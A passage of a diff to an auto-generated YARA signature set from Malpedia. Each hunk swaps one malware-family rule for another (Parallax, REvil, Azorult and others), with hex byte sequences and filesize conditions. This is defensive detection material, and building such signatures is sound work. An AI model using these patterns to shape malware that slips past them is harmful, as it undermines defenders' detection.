logic_hash = "789bf61f14e8f6f349ef8fa3798aaa8ef35e52eb6b6c01f584f1e407643e6f98" + logic_hash = "0ba5f6f81e0a998dcf4930d5e902ddcfa057da2849fe14345a41be1a23cd042b" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -166853,38 +169698,37 @@ rule MALPEDIA_Win_Badcall_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 2bc6 3d00400000 7605 b800400000 } - $sequence_1 = { a3???????? a1???????? 50 c705????????04000000 } - $sequence_2 = { 7605 b800400000 8b4f04 6a00 50 } - $sequence_3 = { 7557 33c0 68???????? a3???????? a3???????? a3???????? } - $sequence_4 = { 48 7455 48 7434 } - $sequence_5 = { 8b6c2414 682c010000 8bcf e8???????? } - $sequence_6 = { 50 c705????????04000000 ff15???????? c20400 a1???????? } - $sequence_7 = { ff15???????? c20400 c705????????01000000 a1???????? 68???????? } - $sequence_8 = { 7434 83e803 7557 33c0 } - $sequence_9 = { 8954240a 66c74424080200 8954240e 894c240c 89542412 } - $sequence_10 = { 8b6c2414 8bc7 2bc6 3d00400000 } - $sequence_11 = { 85c0 7e3b 8b4604 8d542418 52 } - $sequence_12 = { 85db 8bf9 763f 8b6c2414 682c010000 } - $sequence_13 = { e8???????? 85c0 7534 8bc3 2bc6 3d00400000 } - $sequence_14 = { 83fe01 7518 53 ff15???????? } - $sequence_15 = { 85c0 740e 8b4c241c 51 6a01 } + $sequence_0 = { b802000000 eb05 b801000000 33ff } + $sequence_1 = { cc 488bc8 e8???????? 48897d00 48c745080f000000 c645f000 488b4528 } + $sequence_2 = { cc 488bc8 e8???????? 48897da0 48c745a80f000000 c6459000 } + $sequence_3 = { cc 488bc8 e8???????? 48897d18 48c745200f000000 c6450800 } + $sequence_4 = { 83bd98efffff10 8bb5c4efffff 8b8d94efffff 660f7ec8 51 0f43d0 } + $sequence_5 = { cc 488bc8 e8???????? 48897dd0 48c745d80f000000 c645c000 } + $sequence_6 = { cc 488bc8 e8???????? 48897dc0 48c745c80f000000 c645b000 } + $sequence_7 = { cc 488bc8 e8???????? 48897d20 48c745280f000000 c6451000 } + $sequence_8 = { 8d8de4feffff e9???????? 8d8d30ffffff e9???????? 8d8dccfeffff } + $sequence_9 = { 0f87df160000 52 51 e8???????? 8b85e8eeffff } + $sequence_10 = { eb06 8bb5e4eeffff 8b857cefffff 85c0 0f84bd080000 80bdc7eeffff00 } + $sequence_11 = { c785e0feffff0f000000 c685ccfeffff00 6a04 68???????? c7411000000000 c741140f000000 c60100 } + $sequence_12 = { 0f1006 8b85e8eeffff 0f1185b4efffff f30f7e4610 660fd685c4efffff c7461000000000 c746140f000000 } + $sequence_13 = { c746140f000000 c60600 8b5d1c 8d4d08 8b5508 8d7d08 8b4518 } + $sequence_14 = { cc 488bc8 e8???????? 48897de0 48c745e80f000000 c645d000 } condition: - 7 of them and filesize <483328 + 7 of them and filesize <1347904 } -rule MALPEDIA_Win_Rhttpctrl_Auto : FILE +rule MALPEDIA_Win_Parallax_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "22fa66be-3212-5731-af64-75e4d7422a17" + id = "3331f8f9-ca97-5323-a8b7-4a2a5bd3b734" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhttpctrl" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rhttpctrl_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.parallax" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.parallax_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "1c3d2b43c54e91473434d199f4328e6fb482c73192965602da658da1f5036d20" + logic_hash = "2375ab4fbfb357ff0388c05531234fe1711b2c1ab93377989bbf9dcbb0552a8e" score = 75 quality = 75 tags = "FILE" @@ -166898,32 +169742,32 @@ rule MALPEDIA_Win_Rhttpctrl_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 83c404 833d????????ff 7533 ff15???????? 68???????? c705????????dcfb4100 } - $sequence_1 = { e8???????? 8b404c 83b8a800000000 750e 8b04bd30424200 807c302900 741d } - $sequence_2 = { ffb5dcfbffff c785d8fbffff10fc4100 ff15???????? 33c0 } - $sequence_3 = { c645d800 68???????? 8d45d8 660fd645e9 } - $sequence_4 = { 8be5 5d c3 68???????? ff15???????? 833d????????00 b301 } - $sequence_5 = { 3bf1 756e 8b4bf0 8d73f0 8b01 ff5010 397e0c } - $sequence_6 = { 8b08 85c9 7407 395004 } - $sequence_7 = { 50 8d842498000000 50 e8???????? 83cbff 85c0 } - $sequence_8 = { 50 56 ff15???????? 85c0 7536 8b4714 8b35???????? } - $sequence_9 = { 57 e8???????? ffb5f8feffff 8d85fcfeffff 50 } + $sequence_0 = { 8dbf8c000000 b934000000 f3a4 5e 56 ff7508 } + $sequence_1 = { ff7508 ff9698010000 5e 5d c21400 55 8bec } + $sequence_2 = { 8b5234 83c234 8915???????? 83be1801000000 7545 83be1801000000 7401 } + $sequence_3 = { ff763c 683c800000 ff35???????? ff92e0010000 6a00 } + $sequence_4 = { 7411 8b75ec 8b7de0 8b4de8 f3a4 } + $sequence_5 = { 85c0 7418 8bf8 8b35???????? b8ffffffff f0874704 50 } + $sequence_6 = { 6a00 ff9628010000 6a04 68???????? } + $sequence_7 = { e9???????? 3d34800000 750d ff7514 ff7510 e8???????? eb6d } + $sequence_8 = { 8b5634 83c234 52 52 } + $sequence_9 = { 83e934 8b4734 83c034 8b15???????? 50 51 ff92dc000000 } condition: - 7 of them and filesize <339968 + 7 of them and filesize <352256 } -rule MALPEDIA_Win_Coronavirus_Ransomware_Auto : FILE +rule MALPEDIA_Win_Nexster_Bot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "855b633b-3844-51b6-884b-ae39212160b9" + id = "f3849f7f-92fa-5a27-8fce-5cf70a6092f1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.coronavirus_ransomware" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.coronavirus_ransomware_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexster_bot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nexster_bot_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "cdd2b8f03fb9e73cf8c1c825b178f3065340bed6f25c08a712318c114ae54239" + logic_hash = "68d99297d7676950ef20645c2f54f180e697aada925cf75041287d48b2b4b344" score = 75 quality = 75 tags = "FILE" @@ -166937,32 +169781,32 @@ rule MALPEDIA_Win_Coronavirus_Ransomware_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d9b00000000 0fb708 66890c02 83c002 6685c9 75f1 8d8dec7effff } - $sequence_1 = { 894dd8 837e0400 8b5608 c745dc00000000 8955e0 750a 8b45cc } - $sequence_2 = { 50 ff15???????? 85c0 7420 b8???????? e8???????? 50 } - $sequence_3 = { 68fe1f0000 52 8d859e9fffff 50 e8???????? 33c9 } - $sequence_4 = { 83c002 50 52 68???????? 8d8500c0ffff } - $sequence_5 = { 53 e8???????? 83c410 85ff 743b 8d4900 803c1fc3 } - $sequence_6 = { ff15???????? 8b15???????? a1???????? 83c418 52 6a01 50 } - $sequence_7 = { 8b55d0 880417 8b45c8 50 ff15???????? 56 ff15???????? } - $sequence_8 = { ffd6 a3???????? eb0a 53 } - $sequence_9 = { ff15???????? 85c0 7407 ffd0 a3???????? be???????? e8???????? } + $sequence_0 = { 52 e8???????? 68ff030000 8d85bd090000 } + $sequence_1 = { ff15???????? 668985ae010000 6a10 8d85ac010000 50 57 } + $sequence_2 = { 7d10 668b4c4310 66890c45186e4100 40 ebe8 33c0 } + $sequence_3 = { 03f9 837d1810 7208 8b5d04 } + $sequence_4 = { 33c0 8da42400000000 8a1485d0604100 889405000e0000 40 83f80b } + $sequence_5 = { 731a 8bc8 83e01f c1f905 8b0c8d20804100 c1e006 03c1 } + $sequence_6 = { 81c404040000 c3 53 56 57 8bf8 } + $sequence_7 = { 66898c24bc010000 e9???????? 8b15???????? a1???????? 8b0d???????? 899424b0010000 } + $sequence_8 = { 68???????? 52 e8???????? 68???????? 8d85bc110000 50 } + $sequence_9 = { 8a08 40 84c9 75f9 8dbdbc150000 2bc6 4f } condition: - 7 of them and filesize <235520 + 7 of them and filesize <245760 } -rule MALPEDIA_Win_Iconic_Stealer_Auto : FILE +rule MALPEDIA_Win_Manjusaka_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "152db8f5-915a-5ca5-a7d4-f3818a40ffaf" + id = "9f188d62-91cb-5093-86fd-1c78b358599b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.iconic_stealer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.iconic_stealer_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.manjusaka" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.manjusaka_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "dec19b483e0961df8b3ae7026df8b4a85577bd9230fffbf8dd9f39001dd5f48b" + logic_hash = "dab9ae475e0b441f3d26af80a0ebc722e21c766bc33599d09d1c1a5353ad7516" score = 75 quality = 75 tags = "FILE" @@ -166976,32 +169820,32 @@ rule MALPEDIA_Win_Iconic_Stealer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e9???????? 4c8b13 4c8d05e6c60300 488bc6 488bce 83e03f 48c1f906 } - $sequence_1 = { eb29 488d0c76 8d4601 898790000000 488b8788000000 c704c876000000 8954c804 } - $sequence_2 = { 894338 66897318 66894b3e 6644896316 6644894b3c 663bf1 0f85dc000000 } - $sequence_3 = { e8???????? 4881c430020000 415f 415d 415c 5f 5e } - $sequence_4 = { 5f 5e 5d c3 40f6c504 7419 4c8bc7 } - $sequence_5 = { eb05 b901000000 894f28 4885db 741f 8b4f28 48895f10 } - $sequence_6 = { f2490f2ad5 488d4dc7 f20f5e15???????? 66490f7ed0 e8???????? e9???????? 448b44242c } - $sequence_7 = { ffc7 4883c108 3bfa 7cf1 e9???????? 488b4b20 4885c9 } - $sequence_8 = { e9???????? 488b75a8 4c8b442470 8b06 83c003 413b00 7e1f } - $sequence_9 = { c7430400000000 41ba1f000000 49bb1142082184104208 418b49f8 85c9 745b 8d4701 } + $sequence_0 = { ebb8 488d05b77a1000 4889442450 48c744245801000000 48c744246000000000 488d05f9b01100 4889442470 } + $sequence_1 = { 4c89bc2480040000 4c8939 4c897108 48895910 48c7411800800000 0f117018 48897930 } + $sequence_2 = { 791d 418b4128 41034124 4863c8 488bc2 48f7d8 48c1e00a } + $sequence_3 = { 89411c 488b45d7 2b4527 05feffff07 89710c 894120 8b45db } + $sequence_4 = { 4989f8 e8???????? 48ffcb 75ed 0f57f6 488d9c2410010000 0f297320 } + $sequence_5 = { 898c24f8000000 48896c2448 3b08 0f8c21fdffff 4c8bbc24f0000000 4d85f6 7424 } + $sequence_6 = { 814d4002020000 4533c0 48894500 498bcd 83c8ff 66894544 b8c8000000 } + $sequence_7 = { 89573c 48894740 895750 488b442e60 48894758 488b442e28 488b4860 } + $sequence_8 = { f7d8 894c2420 448bc5 498bcd 1bd2 4533c9 83e2fc } + $sequence_9 = { e8???????? 4889d9 e8???????? 488d4f70 e8???????? 488d8fe0000000 e8???????? } condition: - 7 of them and filesize <2401280 + 7 of them and filesize <4772864 } -rule MALPEDIA_Win_Liteduke_Auto : FILE +rule MALPEDIA_Win_Revil_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c89a689f-3dfd-5d2a-aec1-28f7aca47554" + id = "81d28baf-82e1-54c0-bbf9-d56336789206" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.liteduke" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.liteduke_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.revil" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.revil_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "5d6b62682cd8e4bed5eedc1b6f48e136bed91567c9f36c00bf40e1cbea238867" + logic_hash = "2c34d02da785d928c9b5b4ca67c597715944f5d05b15c54928c0e64e7282a006" score = 75 quality = 75 tags = "FILE" @@ -167015,32 +169859,32 @@ rule MALPEDIA_Win_Liteduke_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff7508 ff15???????? ff75fc ff15???????? 5b 5e } - $sequence_1 = { 6800010000 ff15???????? c3 68???????? ff15???????? } - $sequence_2 = { 5b 5e 5f 8b45d8 c9 c20400 55 } - $sequence_3 = { 41 83f904 7cdd 5f 5e } - $sequence_4 = { c9 c20800 55 89e5 ff7508 e8???????? } - $sequence_5 = { c20c00 c70101000000 61 c9 c20c00 c70100000000 61 } - $sequence_6 = { c1c006 243f 3c3e 7205 c0e002 2c0e 2c04 } - $sequence_7 = { 46 8a06 8807 46 43 41 42 } - $sequence_8 = { b800000000 8a03 c1e804 83f809 7f05 83c030 eb03 } - $sequence_9 = { 56 e8???????? 83c40c ff750c 56 e8???????? 83c408 } + $sequence_0 = { 334f1c 83c720 d1f8 83e801 89450c e9???????? 8b7510 } + $sequence_1 = { 50 e8???????? 8b7d08 8db568ffffff 83c414 } + $sequence_2 = { 83e801 eb07 b00a 5d c3 83e862 7428 } + $sequence_3 = { 8d8510ffffff 50 8d8560ffffff 50 8d45b0 50 e8???????? } + $sequence_4 = { ff750c 8d45b0 50 8d85c0feffff 50 } + $sequence_5 = { 8b4508 8b404c 8945f0 8b45e8 894b28 f7d0 23c2 } + $sequence_6 = { 334de0 8b4048 8b5d08 8945ec 8b4508 } + $sequence_7 = { ff7520 e8???????? 8d8580feffff 50 ff7524 } + $sequence_8 = { 8975d8 0fb645ff 0bc8 8bc1 894dd8 } + $sequence_9 = { 83e813 0f8461060000 83e83d 0f84fa020000 f6c204 7411 80f92c } condition: - 7 of them and filesize <1171456 + 7 of them and filesize <155794432 } -rule MALPEDIA_Win_Rgdoor_Auto : FILE +rule MALPEDIA_Win_Bka_Trojaner_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4140ffd6-129c-5510-99e3-ad151c975d1e" + id = "a0a20d3c-b939-5a5e-b947-ecd1e3a9e77c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rgdoor_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bka_trojaner" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bka_trojaner_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "bf6d408b52f68286adc8c589928141fb2586a77ca6ee142e58e02ec6b6fb2c0d" + logic_hash = "b96818656a5fc18803f0bf1dba8c00052206b33d8bd6ff1c085aa051852c2a47" score = 75 quality = 75 tags = "FILE" @@ -167054,32 +169898,32 @@ rule MALPEDIA_Win_Rgdoor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7512 448bfb 448be3 4c8d35d4870100 e9???????? bd01000000 ba98000000 } - $sequence_1 = { 488bce eb9d 33db 41b803010000 488bd6 e8???????? } - $sequence_2 = { 4533f6 eb0e 4983ceff 90 49ffc6 42381c32 75f7 } - $sequence_3 = { e8???????? b802000000 eb30 48837dd010 720a 488b4db8 } - $sequence_4 = { e8???????? 488d05554b0200 4889442458 488d15398d0200 488d4c2458 } - $sequence_5 = { e8???????? 83f8ff 0f8490050000 80bc247001000077 750a 8bde 448be6 } - $sequence_6 = { 8938 e8???????? 488d1d8b390200 4885c0 7404 } - $sequence_7 = { 4883ec20 488d3d8bf90100 48393d???????? 742b } - $sequence_8 = { 48837db010 480f435598 41b822000000 488d8de8000000 e8???????? 4885c0 488b85e0000000 } - $sequence_9 = { 488bce ff15???????? 8bf8 eb25 488b8c2490000000 e9???????? 48895c2420 } + $sequence_0 = { 2bc1 33ff 89442428 397c2420 894c2438 897c242c } + $sequence_1 = { 8b542414 68ff030000 8d8c2468040000 03da 8b54241c 51 } + $sequence_2 = { 50 57 e8???????? 85c0 75c6 5d } + $sequence_3 = { 56 ff5124 85c0 7517 8b44247c 5f } + $sequence_4 = { 85c0 7439 53 8b1d???????? 55 8b2d???????? 8bff } + $sequence_5 = { 8b54240c 8b4c2404 8b8170ffffff 52 8b54240c 81c170ffffff 52 } + $sequence_6 = { 6a10 68???????? 68???????? 52 ff15???????? 83c8ff } + $sequence_7 = { e8???????? 59 59 8945c4 a1???????? } + $sequence_8 = { c7440a04???????? 8b4104 8b4004 8d9078ffffff 891408 8b4104 } + $sequence_9 = { 752d 837df800 7424 ff7508 8d4608 e8???????? ff7508 } condition: - 7 of them and filesize <475136 + 7 of them and filesize <221184 } -rule MALPEDIA_Win_Rifdoor_Auto : FILE +rule MALPEDIA_Win_Pipcreat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "10650b5d-c263-58c2-9892-48c8752426d4" + id = "38c9ab7f-3633-5cf9-b43a-1054dcf3eb2e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rifdoor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rifdoor_auto.yar#L1-L174" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipcreat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pipcreat_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "041eb6ebe0e6f7a680f9d10fa1b95fdf41bb567152330eaf4a0d973e56aa2474" + logic_hash = "c78f35b80acd6d02ab8a3808b0a24320b25c92c8bd70c4aff6d75dba01d58da4" score = 75 quality = 75 tags = "FILE" @@ -167093,38 +169937,32 @@ rule MALPEDIA_Win_Rifdoor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 8be5 5d c20400 6804010000 8d54240c } - $sequence_1 = { 0f8484000000 391d???????? 747c 391d???????? 7474 391d???????? 746c } - $sequence_2 = { ba4f000000 8bc2 668944243c b952000000 66894c2438 668954243a } - $sequence_3 = { 83c408 85c0 7405 bf01000000 8d542410 52 ff15???????? } - $sequence_4 = { 830eff 2b34bd605d4100 c1fe06 8bc7 c1e005 } - $sequence_5 = { b001 5e 81c408010000 c3 5f 32c0 } - $sequence_6 = { 8d4c2454 51 8b4c2410 8d54242c e8???????? 83c408 85c0 } - $sequence_7 = { 83c408 a3???????? e9???????? 3c01 } - $sequence_8 = { 53 56 8b35???????? 57 3b35???????? 7d4a } - $sequence_9 = { 50 8b410c ffd0 8b95f0f7ffff } - $sequence_10 = { e8???????? 8b1d???????? 33c0 83c40c 33d2 } - $sequence_11 = { 68ff000000 8d9524faffff 52 ff15???????? } - $sequence_12 = { 75f9 8d8de8fbffff 2bc2 51 40 } - $sequence_13 = { c1ee08 0bd6 884101 03c2 8d1400 33d0 } - $sequence_14 = { ff15???????? 68???????? 6a00 6801001f00 ff15???????? 5f 5e } - $sequence_15 = { 8d8424a8010000 50 53 ff15???????? 85c0 7507 53 } + $sequence_0 = { 50 ffd6 85c0 751b 8d851cfeffff c7851cfeffff14010000 } + $sequence_1 = { 6a00 8d442420 6a00 50 6a01 6a02 6a20 } + $sequence_2 = { 8b4c2404 68???????? 6a01 51 ff15???????? 85c0 } + $sequence_3 = { 56 ff15???????? 85c0 741d 6a30 6868420010 } + $sequence_4 = { e9???????? 83bd20feffff04 770a 6888410010 e9???????? 83bd20feffff05 8b35???????? } + $sequence_5 = { 56 57 be9c400010 8d7df8 8d45f8 a5 50 } + $sequence_6 = { eb12 6838470010 ff15???????? 6a20 6898420010 } + $sequence_7 = { 59 8d8538ffffff 6a28 50 } + $sequence_8 = { 7426 50 50 50 8b15???????? } + $sequence_9 = { be???????? 8d7c2414 33c0 f3a5 b975000000 } condition: - 7 of them and filesize <212992 + 7 of them and filesize <65536 } -rule MALPEDIA_Win_Amtsol_Auto : FILE +rule MALPEDIA_Win_Adkoob_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c4e6651d-976c-58ca-adc5-c02364c8423a" + id = "09ef20a4-923f-52b9-be25-7277d044ed19" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.amtsol" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.amtsol_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.adkoob" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.adkoob_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "27d50e01d30776676c026a6886e9d6b54d3f1024ee993525160ca52cbcf77c05" + logic_hash = "0f163717fb5860f8982d25c9dbbe18c357f664ad9d46a5bfca06cc794c00bf30" score = 75 quality = 75 tags = "FILE" @@ -167138,32 +169976,32 @@ rule MALPEDIA_Win_Amtsol_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 33c8 234df0 8945fc 8b45f8 33cb 034e34 6a05 } - $sequence_1 = { 53 ff7580 ff7594 ff36 } - $sequence_2 = { 885d6f ff75d4 8d4510 50 8d4568 50 } - $sequence_3 = { 53 8b5d0c 8bce 2bde 3b7d10 7d23 } - $sequence_4 = { c645d543 c645d668 c645d765 c645d863 c645d96b c645da3a 885ddb } - $sequence_5 = { 8bec 8b4508 33c9 3bc1 7504 33c0 5d } - $sequence_6 = { ff15???????? 83f8ff 752b 8d45e8 50 c645e823 c645e92d } - $sequence_7 = { 85c0 7524 a1???????? a3???????? a1???????? c705????????b2194100 8935???????? } - $sequence_8 = { 0f84bf000000 56 53 50 e8???????? 56 } - $sequence_9 = { e8???????? 8d443001 59 895df4 3818 0f8430010000 50 } + $sequence_0 = { ff706c ffb0b0000000 8bc7 6a14 59 99 f7f9 } + $sequence_1 = { ff75f0 6a38 5a e8???????? 83c40c 8bce 40 } + $sequence_2 = { 8d5801 e9???????? 53 8bcf e8???????? 8b5dd8 84c0 } + $sequence_3 = { 8955f8 8b90d4000000 0fb6443b06 c1e108 0bc8 897de8 2bf1 } + $sequence_4 = { ff504c 85c0 7536 8b75dc 56 ff15???????? 50 } + $sequence_5 = { 8b7508 83fe09 7756 80beac1d4c0000 57 8b3d???????? 0f453d???????? } + $sequence_6 = { ff75e8 ff15???????? 837dd000 8b35???????? 7405 ff75d0 ffd6 } + $sequence_7 = { ff742418 68???????? e8???????? 83c40c 89442428 85c0 747b } + $sequence_8 = { ff7510 8bce ffb578ffffff ff75b8 ff7598 ffb564ffffff ff75c4 } + $sequence_9 = { 8b4744 52 50 8b08 ff5114 59 59 } condition: - 7 of them and filesize <335872 + 7 of them and filesize <1867776 } -rule MALPEDIA_Win_Makop_Auto : FILE +rule MALPEDIA_Win_Helauto_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0ddd5ad6-ed99-5e37-bafe-b552882375b1" + id = "8190d0b6-60e2-55b8-bbd3-4f8143a5c37c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.makop" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.makop_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.helauto" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.helauto_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "153590702efa562c07e5adda47cdb1581820d31e1d121adbb82083fd02f6f827" + logic_hash = "4d9d81740e3a201d5c095a9d2008fa9ef0381381c707cf34a732c2ace99e1c38" score = 75 quality = 75 tags = "FILE" @@ -167177,32 +170015,32 @@ rule MALPEDIA_Win_Makop_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 55 8bec 83e4f8 81ec10040000 53 55 56 } - $sequence_1 = { 8b84244c010000 8bcb 51 8b8c244c010000 52 50 51 } - $sequence_2 = { 117c241c 8bb840080000 017c2420 8bb844080000 117c2424 8b8050080000 3bc3 } - $sequence_3 = { 3d11010000 0f8567030000 0fb7442444 0517fcffff 83f806 0f8754030000 ff24859c4f4000 } - $sequence_4 = { 53 ff15???????? 85c0 0f84f1000000 6a00 8d442418 } - $sequence_5 = { 8d442418 50 51 e8???????? 85c0 0f85cb000000 } - $sequence_6 = { bb01000000 395d08 7571 b8???????? 668b08 83c002 6685c9 } - $sequence_7 = { 5e 5b 83c41c c3 ff15???????? 50 } - $sequence_8 = { 33db 3bf3 740f 56 895e18 895e1c } - $sequence_9 = { 895c241c 895c2420 895c2424 745e 90 8b06 } + $sequence_0 = { 8b45d4 83c40c 898568ffffff 8b45d0 } + $sequence_1 = { ff75ec ffd6 6830750000 eb48 } + $sequence_2 = { 69c060ea0000 83c430 3d60ea0000 a3???????? } + $sequence_3 = { 85c0 0f841f010000 8b3d???????? 6a05 8d85a8f3ffff 68???????? } + $sequence_4 = { 59 50 8d8574ffffff 50 53 53 ff75fc } + $sequence_5 = { 85c0 7508 53 ff15???????? 59 33c0 } + $sequence_6 = { 50 ff15???????? 83c40c 85c0 0f8593000000 50 } + $sequence_7 = { 68???????? 50 ff15???????? 83c40c 85c0 0f8593000000 } + $sequence_8 = { 8d4608 50 68???????? 53 e8???????? 83c418 83feff } + $sequence_9 = { 51 8d4df0 e8???????? 8365fc00 8d4df0 } condition: - 7 of them and filesize <107520 + 7 of them and filesize <57344 } -rule MALPEDIA_Win_Sappycache_Auto : FILE +rule MALPEDIA_Win_Azorult_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ad4dab53-cb13-5a84-86d5-edc74e26f321" + id = "b51dfae0-9dbd-5fdb-9b21-c42d24abe8fe" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sappycache" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sappycache_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.azorult_auto.yar#L1-L156" license_url = "N/A" - logic_hash = "f4483696db263dfbbabb83dfce8ccde9309b112a65cf425cc63ed3dc1fcead40" + logic_hash = "57462241e7f147f9f02722e7f4f98394823c33b074e00b1372b7118c997d7f9f" score = 75 quality = 75 tags = "FILE" @@ -167216,32 +170054,38 @@ rule MALPEDIA_Win_Sappycache_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 448bcf 895c2428 33d2 33c9 4889442420 488bf0 ff15???????? } - $sequence_1 = { ff15???????? 85c0 7428 488bcd 488d1545f80000 } - $sequence_2 = { 488b8188000000 488d0d16fa0000 4883c018 7452 8bd7 0f1000 } - $sequence_3 = { ff15???????? 41b904000000 c7452060ea0000 4c8d4520 } - $sequence_4 = { 4c8d0dd6860000 c5f35cca c4c173590cc1 4c8d0da5760000 c5f359c1 } - $sequence_5 = { 49ffc0 47382c04 75f7 488d157c1f0100 } - $sequence_6 = { 4c89742430 448bcf 895c2428 33d2 33c9 4889442420 } - $sequence_7 = { f20f1000 8b7808 e9???????? 488d05eed70000 4a8b0ce8 42f644313880 744d } - $sequence_8 = { 4c8d0d136d0000 8bf9 488d15ba4d0000 b906000000 4c8d05f66c0000 e8???????? } - $sequence_9 = { 4180e003 80e30f 41c0e004 440ac0 } + $sequence_0 = { 50 ba???????? 8d45e8 e8???????? 8d45e4 8b55f8 8a543201 } + $sequence_1 = { e8???????? 56 8d85a0fdffff b9???????? } + $sequence_2 = { b9???????? 8b55fc e8???????? 8b859cfdffff e8???????? } + $sequence_3 = { b80f270000 e8???????? 8945f8 8d55f4 8bc3 } + $sequence_4 = { b80f270000 e8???????? 8bf0 b80f270000 } + $sequence_5 = { 7518 56 8b45fc e8???????? 8bc8 8d5301 } + $sequence_6 = { b80f270000 e8???????? 8bd8 b80f270000 } + $sequence_7 = { ba03000000 e8???????? 8d858cfdffff e8???????? } + $sequence_8 = { 7506 ff05???????? 56 e8???????? 59 } + $sequence_9 = { e8???????? 59 8b45f4 40 } 